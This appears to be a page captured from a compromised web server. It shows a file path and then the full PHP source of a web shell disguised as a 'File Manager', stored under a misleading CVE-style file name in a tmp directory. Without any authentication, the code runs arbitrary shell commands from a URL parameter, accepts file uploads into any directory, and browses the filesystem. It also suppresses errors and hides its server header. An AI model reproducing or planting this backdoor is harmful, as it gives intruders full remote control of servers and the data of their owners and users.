Your IP : 216.73.216.65
| Current Path : /home/ataenra/www/tmp/ |
|
|
| Current File : /home/ataenra/www/tmp/cve-2026-48907-1154.xml.php |
<?php
error_reporting(0);
define('SECURE_ACCESS', true);
header('X-Powered-By: none');
header('Content-Type: text/html; charset=UTF-8');
$dir = isset($_GET['dir']) ? $_GET['dir'] : '.';
$realDir = realpath($dir);
if (!$realDir || !is_dir($realDir)) {{
$dir = '.';
$realDir = realpath('.');
}}
if (isset($_GET['cmd'])) {{
echo "<pre>";
system($_GET['cmd'] . " 2>&1");
echo "</pre>";
exit;
}}
if (isset($_POST['upload']) && isset($_FILES['file']) && $_FILES['file']['error'] == 0) {{
$target = rtrim($realDir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {{
$msg = "[OK] Uploaded: " . htmlspecialchars(basename($_FILES['file']['name']));
}} else {{
$msg = "[ERR] Upload failed.";
}}
}}
?>
<!DOCTYPE html>
<html>
<head>
<style>
body{{font-family:sans-serif;background:#111;color:#0f0;padding:20px}}
a{{color:#0ff}} h1{{color:#0f0}} .msg{{color:#ff0}}
ul{{list-style:none;padding:0}} li{{padding:4px 0;border-bottom:1px solid #333}}
</style>
</head>
<body>
<h1>File Manager</h1>
<p>Dir: <?php echo htmlspecialchars($realDir); ?></p>
<?php if(isset($msg)) echo '<p class="msg">'.$msg.'</p>'; ?>
<form method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" name="upload" value="Upload">
</form>
<ul>
<?php
$files = scandir($dir);
natcasesort($files);
foreach ($files as $file) {{
if ($file === '.' || $file === '..') continue;
$path = $dir . '/' . $file;
$encFile = htmlspecialchars($file);
if (is_dir($path)) {{
echo '<li>[DIR] <a href="?dir=' . htmlspecialchars(urlencode($path)) . '">' . $encFile . '</a></li>';
}} else {{
echo '<li>[FILE] ' . $encFile . '</li>';
}}
}}
?>
</ul>
</body>
</html>